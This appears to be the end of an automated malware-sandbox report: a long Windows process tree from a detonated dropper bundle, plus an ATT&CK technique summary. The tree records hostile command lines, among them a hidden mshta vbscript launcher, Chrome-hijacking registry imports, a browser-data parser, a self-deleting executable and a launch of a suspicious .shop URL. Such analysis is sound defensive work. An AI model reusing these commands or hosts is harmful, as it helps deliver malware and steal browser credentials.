                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-0RFL3.tmp\IBInstaller_97039.tmp" /SL5="$203CA,14452723,721408,C:\Users\Admin\AppData\Local\Temp\ue02b4um50n\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                  PID:6204
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-LP7S3.tmp\{app}\chrome_proxy.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-LP7S3.tmp\{app}\chrome_proxy.exe"
                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                      PID:6708
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-LP7S3.tmp\{app}\chrome_proxy.exe"
                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                          PID:856
                                                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                            ping localhost -n 4
                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                            PID:7624
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        "cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                          PID:6696
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3733.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\3733.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                    PID:956
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3C07.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\3C07.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:4748
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:3840
                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                          taskkill /f /im chrome.exe
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                          PID:3096
                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                      PID:5004
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\AE3A.tmp.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\AE3A.tmp.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:5884
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\B0DB.tmp.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\B0DB.tmp.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:5604
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\C677.tmp.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\C677.tmp.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:5972
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\C677.tmp.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\C677.tmp.exe
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:7652
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\D1F2.tmp.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\D1F2.tmp.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:6396
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\D1F2.tmp.exe
                                                                                                                                                                                                  "{path}"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:7960
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\EF7D.tmp.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\EF7D.tmp.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:7140
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-TTCN7.tmp\Setup.tmp
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-TTCN7.tmp\Setup.tmp" /SL5="$502CA,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-2ITCO.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:4856
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\ProPlugin.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\ProPlugin.exe" /Verysilent
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5196
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-NNP1V.tmp\ProPlugin.tmp
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-NNP1V.tmp\ProPlugin.tmp" /SL5="$3041C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\ProPlugin.exe" /Verysilent
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:6636
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-0E2CL.tmp\Setup.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-0E2CL.tmp\Setup.exe"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:7268
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:7404
                                                                                                                                                                                                                      • C:\Windows\regedit.exe
                                                                                                                                                                                                                        regedit /s chrome.reg
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Runs .reg file with regedit
                                                                                                                                                                                                                        PID:6756
                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\TASKKILL.exe
                                                                                                                                                                                                                        TASKKILL /F /IM chrome.exe
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                        PID:5176
                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c chrome64.bat
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:5944
                                                                                                                                                                                                                          • C:\Windows\system32\mshta.exe
                                                                                                                                                                                                                            mshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                              PID:1280
                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\chrome64.bat" h"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                  PID:3320
                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    "C:/Program Files/Google/Chrome/Application/chrome.exe"
                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                      PID:7252
                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x7ffc34636e00,0x7ffc34636e10,0x7ffc34636e20
                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                          PID:7804
                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,17106706259645514003,18410134020337327782,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1680 /prefetch:8
                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                            PID:5524
                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,17106706259645514003,18410134020337327782,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2376 /prefetch:1
                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                              PID:7188
                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,17106706259645514003,18410134020337327782,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2332 /prefetch:1
                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                PID:6064
                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1620,17106706259645514003,18410134020337327782,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1632 /prefetch:2
                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                  PID:4232
                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,17106706259645514003,18410134020337327782,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1980 /prefetch:1
                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                    PID:5592
                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,17106706259645514003,18410134020337327782,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1968 /prefetch:1
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                      PID:7820
                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,17106706259645514003,18410134020337327782,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2008 /prefetch:1
                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                        PID:7752
                                                                                                                                                                                                                                              • C:\Windows\regedit.exe
                                                                                                                                                                                                                                                regedit /s chrome-set.reg
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                • Runs .reg file with regedit
                                                                                                                                                                                                                                                PID:7740
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                                                                                                                                                                                                                                parse.exe -f json -b firefox
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:6736
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\PictureLAb.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\PictureLAb.exe" /Verysilent
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:7904
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-D1ARS.tmp\PictureLAb.tmp
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-D1ARS.tmp\PictureLAb.tmp" /SL5="$4041C,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\PictureLAb.exe" /Verysilent
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:7932
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-L5EU6.tmp\Setup.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-L5EU6.tmp\Setup.exe" /VERYSILENT
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:2092
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-9BATA.tmp\Setup.tmp
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-9BATA.tmp\Setup.tmp" /SL5="$6046E,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-L5EU6.tmp\Setup.exe" /VERYSILENT
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:2032
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-RJ424.tmp\kkkk.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-RJ424.tmp\kkkk.exe" /S /UID=lab214
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                            PID:4304
                                                                                                                                                                                                                                                            • C:\Program Files\Windows Sidebar\ZSVCJPFVID\prolab.exe
                                                                                                                                                                                                                                                              "C:\Program Files\Windows Sidebar\ZSVCJPFVID\prolab.exe" /VERYSILENT
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                PID:7276
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-M9BIA.tmp\prolab.tmp
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-M9BIA.tmp\prolab.tmp" /SL5="$305F2,575243,216576,C:\Program Files\Windows Sidebar\ZSVCJPFVID\prolab.exe" /VERYSILENT
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                    PID:5700
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a9-40d05-752-ff3b2-4e68c4e907280\Mewojiviti.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a9-40d05-752-ff3b2-4e68c4e907280\Mewojiviti.exe"
                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                    PID:7572
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\Delta.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\Delta.exe" /Verysilent
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:6880
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-1LAKN.tmp\Delta.tmp
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-1LAKN.tmp\Delta.tmp" /SL5="$5041C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\Delta.exe" /Verysilent
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:4964
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-6LJ62.tmp\Setup.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-6LJ62.tmp\Setup.exe" /VERYSILENT
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:8076
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\zznote.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\zznote.exe" /Verysilent
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:6424
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:6408
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:5236
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                        timeout 1
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                        PID:5740
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:7492
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe"
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:7504
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:7516
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:7532
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6408 -s 2472
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                              PID:7632
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:4496
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5DBA.tmp.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\5DBA.tmp.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:6988
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:6780
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\iwfiare
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\iwfiare
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:6724
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\esfiare
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\esfiare
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:7032
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\dwfiare
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\dwfiare
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:5456
                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:2152
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:4300
                                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:6228
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:4324
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:6388
                                                                                                                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:6740
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:1760
                                                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:6616
                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:6476
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:6060
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                                                                                                            werfault.exe /h /shared Global\3d9a79b5ff8143058f8dfd42ccf19bc3 /t 7164 /p 4496
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:5800
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\A18A.exe
                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\A18A.exe
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:4424
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:7872
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\C715.exe
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\C715.exe
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:7780
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1B60.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1B60.exe
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:8144

                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                    Execution

                                                                                                                                                                                                                                                                                                                    Command-Line Interface

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1059

                                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                                                                                    New Service

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1050

                                                                                                                                                                                                                                                                                                                    Modify Existing Service

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1031

                                                                                                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                                    T1060

                                                                                                                                                                                                                                                                                                                    Bootkit

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1067

                                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                                                                                                                                    New Service

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1050

                                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                                                                                                    Disabling Security Tools

                                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                                    T1089

                                                                                                                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                                                                                                                    6
                                                                                                                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                                                                                                                    Impair Defenses

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1562

                                                                                                                                                                                                                                                                                                                    File Permissions Modification

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1222

                                                                                                                                                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1130

                                                                                                                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                                                                                                                                    4
                                                                                                                                                                                                                                                                                                                    T1081

                                                                                                                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                                                                                                                    Software Discovery

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1518

                                                                                                                                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                                                                                                                                    5
                                                                                                                                                                                                                                                                                                                    T1012

                                                                                                                                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                                                                                                                                    6
                                                                                                                                                                                                                                                                                                                    T1082

                                                                                                                                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                                    T1120

                                                                                                                                                                                                                                                                                                                    Remote System Discovery

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1018

                                                                                                                                                                                                                                                                                                                    Collection

                                                                                                                                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                                                                                                                                    4
                                                                                                                                                                                                                                                                                                                    T1005

                                                                                                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                    Downloads

